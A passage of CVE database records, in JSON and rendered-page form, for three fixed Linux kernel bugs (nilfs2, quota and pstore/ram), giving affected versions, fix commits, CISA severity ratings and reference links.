"type": "ssvc"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "CWE-noinfo Not enough information",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-11-07T14:55:46.383Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:14:12.823Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/c4a09fdac625e64abe478dcf88bfa20406616928"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/d31c8721e816eff5ca6573cc487754f357c093cd"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/f3e4963566f58726d3265a727116a42b591f6596"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/8fa90634ec3e9cc50f42dd605eec60f2d146ced8"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/6589f0f72f8edd1fa11adce4eedbd3615f2e78ab"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/2c3bdba00283a6c7a5b19481a59a730f46063803"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/626daab3811b772086aef1bf8eed3ffe6f523eff"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/5bc09b397cbf1221f8a8aacb1152650c9195b02b"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"fs/nilfs2/segment.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "c4a09fdac625e64abe478dcf88bfa20406616928",
"status": "affected",
"version": "7f42ec3941560f0902fe3671e36f2c20ffd3af0a",
"versionType": "git"
},
{
"lessThan": "d31c8721e816eff5ca6573cc487754f357c093cd",
"status": "affected",
"version": "7f42ec3941560f0902fe3671e36f2c20ffd3af0a",
"versionType": "git"
},
{
"lessThan": "f3e4963566f58726d3265a727116a42b591f6596",
"status": "affected",
"version": "7f42ec3941560f0902fe3671e36f2c20ffd3af0a",
"versionType": "git"
},
{
"lessThan": "8fa90634ec3e9cc50f42dd605eec60f2d146ced8",
"status": "affected",
"version": "7f42ec3941560f0902fe3671e36f2c20ffd3af0a",
"versionType": "git"
},
{
"lessThan": "6589f0f72f8edd1fa11adce4eedbd3615f2e78ab",
"status": "affected",
"version": "7f42ec3941560f0902fe3671e36f2c20ffd3af0a",
"versionType": "git"
},
{
"lessThan": "2c3bdba00283a6c7a5b19481a59a730f46063803",
"status": "affected",
"version": "7f42ec3941560f0902fe3671e36f2c20ffd3af0a",
"versionType": "git"
},
{
"lessThan": "626daab3811b772086aef1bf8eed3ffe6f523eff",
"status": "affected",
"version": "7f42ec3941560f0902fe3671e36f2c20ffd3af0a",
"versionType": "git"
},
{
"lessThan": "5bc09b397cbf1221f8a8aacb1152650c9195b02b",
"status": "affected",
"version": "7f42ec3941560f0902fe3671e36f2c20ffd3af0a",
"versionType": "git"
},
{
"status": "affected",
"version": "ccebcc74c81d8399c7b204aea47c1f33b09c2b17",
"versionType": "git"
},
{
"status": "affected",
"version": "831c87640d23ccb253a02e4901bd9a325b5e8c2d",
"versionType": "git"
},
{
"status": "affected",
"version": "d8974c7fe717ee8fb0706e35cc92e0bcdf660ec5",
"versionType": "git"
},
{
"status": "affected",
"version": "8f67918af09fc0ffd426a9b6f87697976d3fbc7b",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"fs/nilfs2/segment.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "3.12"
},
{
"lessThan": "3.12",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.307",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.269",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.210",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.149",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.79",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.18",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.6",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.307",
"versionStartIncluding": "3.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.269",
"versionStartIncluding": "3.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.210",
"versionStartIncluding": "3.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.149",
"versionStartIncluding": "3.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.79",
"versionStartIncluding": "3.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.18",
"versionStartIncluding": "3.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.6",
"versionStartIncluding": "3.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"versionStartIncluding": "3.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "3.2.52",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "3.4.83",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "3.10.16",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "3.11.5",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnilfs2: fix potential bug in end_buffer_async_write\n\nAccording to a syzbot report, end_buffer_async_write(), which handles the\ncompletion of block device writes, may detect abnormal condition of the\nbuffer async_write flag and cause a BUG_ON failure when using nilfs2.\n\nNilfs2 itself does not use end_buffer_async_write(). But, the async_write\nflag is now used as a marker by commit 7f42ec394156 (\"nilfs2: fix issue\nwith race condition of competition between segments for dirty blocks\") as\na means of resolving double list insertion of dirty blocks in\nnilfs_lookup_dirty_data_buffers() and nilfs_lookup_node_buffers() and the\nresulting crash.\n\nThis modification is safe as long as it is used for file data and b-tree\nnode blocks where the page caches are independent. However, it was\nirrelevant and redundant to also introduce async_write for segment summary\nand super root blocks that share buffers with the backing device. This\nled to the possibility that the BUG_ON check in end_buffer_async_write\nwould fail as described above, if independent writebacks of the backing\ndevice occurred in parallel.\n\nThe use of async_write for segment summary buffers has already been\nremoved in a previous change.\n\nFix this issue by removing the manipulation of the async_write flag for\nthe remaining super root block buffer."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T12:54:26.516Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/c4a09fdac625e64abe478dcf88bfa20406616928"
},
{
"url": "https://git.kernel.org/stable/c/d31c8721e816eff5ca6573cc487754f357c093cd"
},
{
"url": "https://git.kernel.org/stable/c/f3e4963566f58726d3265a727116a42b591f6596"
},
{
"url": "https://git.kernel.org/stable/c/8fa90634ec3e9cc50f42dd605eec60f2d146ced8"
},
{
"url": "https://git.kernel.org/stable/c/6589f0f72f8edd1fa11adce4eedbd3615f2e78ab"
},
{
"url": "https://git.kernel.org/stable/c/2c3bdba00283a6c7a5b19481a59a730f46063803"
},
{
"url": "https://git.kernel.org/stable/c/626daab3811b772086aef1bf8eed3ffe6f523eff"
},
{
"url": "https://git.kernel.org/stable/c/5bc09b397cbf1221f8a8aacb1152650c9195b02b"
}
],
"title": "nilfs2: fix potential bug in end_buffer_async_write",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-26685",
"datePublished": "2024-04-03T14:54:47.688Z",
"dateReserved": "2024-02-19T14:20:24.153Z",
"dateUpdated": "2025-05-04T12:54:26.516Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-26878 (GCVE-0-2024-26878)
Vulnerability from cvelistv5
Published
2024-04-17 10:27
Modified
2025-05-04 08:58
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
quota: Fix potential NULL pointer dereference
Below race may cause NULL pointer dereference
P1 P2
dquot_free_inode quota_off
drop_dquot_ref
remove_dquot_ref
dquots = i_dquot(inode)
dquots = i_dquot(inode)
srcu_read_lock
dquots[cnt]) != NULL (1)
dquots[type] = NULL (2)
spin_lock(&dquots[cnt]->dq_dqb_lock) (3)
....
If dquot_free_inode(or other routines) checks inode's quota pointers (1)
before quota_off sets it to NULL(2) and use it (3) after that, NULL pointer
dereference will be triggered.
So let's fix it by using a temporary pointer to avoid this issue.
References
| URL | Tags | ||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 |
||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:21:04.234Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/8514899c1a4edf802f03c408db901063aa3f05a1"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/49669f8e7eb053f91d239df7b1bfb4500255a9d0"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/61380537aa6dd32d8a723d98b8f1bd1b11d8fee0"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/1ca72a3de915f87232c9a4cb9bebbd3af8ed3e25"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/7f9e833fc0f9b47be503af012eb5903086939754"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/40a673b4b07efd6f74ff3ab60f38b26aa91ee5d5"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/f2649d98aa9ca8623149b3cb8df00c944f5655c7"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/6afc9f4434fa8063aa768c2bf5bf98583aee0877"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/d0aa72604fbd80c8aabb46eda00535ed35570f1f"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-26878",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T15:48:25.754517Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:33:25.716Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"fs/quota/dquot.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "8514899c1a4edf802f03c408db901063aa3f05a1",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "49669f8e7eb053f91d239df7b1bfb4500255a9d0",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "61380537aa6dd32d8a723d98b8f1bd1b11d8fee0",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "1ca72a3de915f87232c9a4cb9bebbd3af8ed3e25",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "7f9e833fc0f9b47be503af012eb5903086939754",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "40a673b4b07efd6f74ff3ab60f38b26aa91ee5d5",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "f2649d98aa9ca8623149b3cb8df00c944f5655c7",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "6afc9f4434fa8063aa768c2bf5bf98583aee0877",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "d0aa72604fbd80c8aabb46eda00535ed35570f1f",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"fs/quota/dquot.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.311",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.273",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.214",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.153",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.83",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.23",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.11",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.2",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.311",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.273",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.214",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.153",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.83",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.23",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.11",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nquota: Fix potential NULL pointer dereference\n\nBelow race may cause NULL pointer dereference\n\nP1\t\t\t\t\tP2\ndquot_free_inode\t\t\tquota_off\n\t\t\t\t\t drop_dquot_ref\n\t\t\t\t\t remove_dquot_ref\n\t\t\t\t\t dquots = i_dquot(inode)\n dquots = i_dquot(inode)\n srcu_read_lock\n dquots[cnt]) != NULL (1)\n\t\t\t\t\t dquots[type] = NULL (2)\n spin_lock(\u0026dquots[cnt]-\u003edq_dqb_lock) (3)\n ....\n\nIf dquot_free_inode(or other routines) checks inode\u0027s quota pointers (1)\nbefore quota_off sets it to NULL(2) and use it (3) after that, NULL pointer\ndereference will be triggered.\n\nSo let\u0027s fix it by using a temporary pointer to avoid this issue."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T08:58:41.311Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/8514899c1a4edf802f03c408db901063aa3f05a1"
},
{
"url": "https://git.kernel.org/stable/c/49669f8e7eb053f91d239df7b1bfb4500255a9d0"
},
{
"url": "https://git.kernel.org/stable/c/61380537aa6dd32d8a723d98b8f1bd1b11d8fee0"
},
{
"url": "https://git.kernel.org/stable/c/1ca72a3de915f87232c9a4cb9bebbd3af8ed3e25"
},
{
"url": "https://git.kernel.org/stable/c/7f9e833fc0f9b47be503af012eb5903086939754"
},
{
"url": "https://git.kernel.org/stable/c/40a673b4b07efd6f74ff3ab60f38b26aa91ee5d5"
},
{
"url": "https://git.kernel.org/stable/c/f2649d98aa9ca8623149b3cb8df00c944f5655c7"
},
{
"url": "https://git.kernel.org/stable/c/6afc9f4434fa8063aa768c2bf5bf98583aee0877"
},
{
"url": "https://git.kernel.org/stable/c/d0aa72604fbd80c8aabb46eda00535ed35570f1f"
}
],
"title": "quota: Fix potential NULL pointer dereference",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-26878",
"datePublished": "2024-04-17T10:27:35.838Z",
"dateReserved": "2024-02-19T14:20:24.185Z",
"dateUpdated": "2025-05-04T08:58:41.311Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2023-52619 (GCVE-0-2023-52619)
Vulnerability from cvelistv5
Published
2024-03-18 10:19
Modified
2025-05-04 07:40
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
pstore/ram: Fix crash when setting number of cpus to an odd number
When the number of cpu cores is adjusted to 7 or other odd numbers,
the zone size will become an odd number.
The address of the zone will become:
addr of zone0 = BASE
addr of zone1 = BASE + zone_size
addr of zone2 = BASE + zone_size*2
...
The address of zone1/3/5/7 will be mapped to non-alignment va.
Eventually crashes will occur when accessing these va.
So, use ALIGN_DOWN() to make sure the zone size is even
to avoid this bug.
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2023-52619",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-03-18T14:22:57.908463Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-04T17:23:25.786Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T23:03:21.348Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/8b69c30f4e8b69131d92096cb296dc1f217101e4"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/e9f6ac50890104fdf8194f2865680689239d30fb"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/a63e48cd835c34c38ef671d344cc029b1ea5bf10"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/2a37905d47bffec61e95d99f0c1cc5dc6377956c"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/75b0f71b26b3ad833c5c0670109c0af6e021e86a"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/0593cfd321df9001142a9d2c58d4144917dff7ee"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/cd40e43f870cf21726b22487a95ed223790b3542"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/d49270a04623ce3c0afddbf3e984cb245aa48e9c"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"fs/pstore/ram.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "8b69c30f4e8b69131d92096cb296dc1f217101e4",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "e9f6ac50890104fdf8194f2865680689239d30fb",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "a63e48cd835c34c38ef671d344cc029b1ea5bf10",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "2a37905d47bffec61e95d99f0c1cc5dc6377956c",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "75b0f71b26b3ad833c5c0670109c0af6e021e86a",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "0593cfd321df9001142a9d2c58d4144917dff7ee",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "cd40e43f870cf21726b22487a95ed223790b3542",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "d49270a04623ce3c0afddbf3e984cb245aa48e9c",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"fs/pstore/ram.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.307",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.269",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.210",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.149",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.77",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.16",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.4",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.307",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.269",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.210",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.149",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.77",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.16",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\npstore/ram: Fix crash when setting number of cpus to an odd number\n\nWhen the number of cpu cores is adjusted to 7 or other odd numbers,\nthe zone size will become an odd number.\nThe address of the zone will become:\n addr of zone0 = BASE\n addr of zone1 = BASE + zone_size\n addr of zone2 = BASE + zone_size*2\n ...\nThe address of zone1/3/5/7 will be mapped to non-alignment va.\nEventually crashes will occur when accessing these va.\n\nSo, use ALIGN_DOWN() to make sure the zone size is even\nto avoid this bug."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T07:40:01.100Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/8b69c30f4e8b69131d92096cb296dc1f217101e4"
},
{
"url": "https://git.kernel.org/stable/c/e9f6ac50890104fdf8194f2865680689239d30fb"
},
{
"url": "https://git.kernel.org/stable/c/a63e48cd835c34c38ef671d344cc029b1ea5bf10"
},
{
"url": "https://git.kernel.org/stable/c/2a37905d47bffec61e95d99f0c1cc5dc6377956c"
},
{
"url": "https://git.kernel.org/stable/c/75b0f71b26b3ad833c5c0670109c0af6e021e86a"
},
{
"url": "https://git.kernel.org/stable/c/0593cfd321df9001142a9d2c58d4144917dff7ee"
},
{
"url": "https://git.kernel.org/stable/c/cd40e43f870cf21726b22487a95ed223790b3542"
},
{
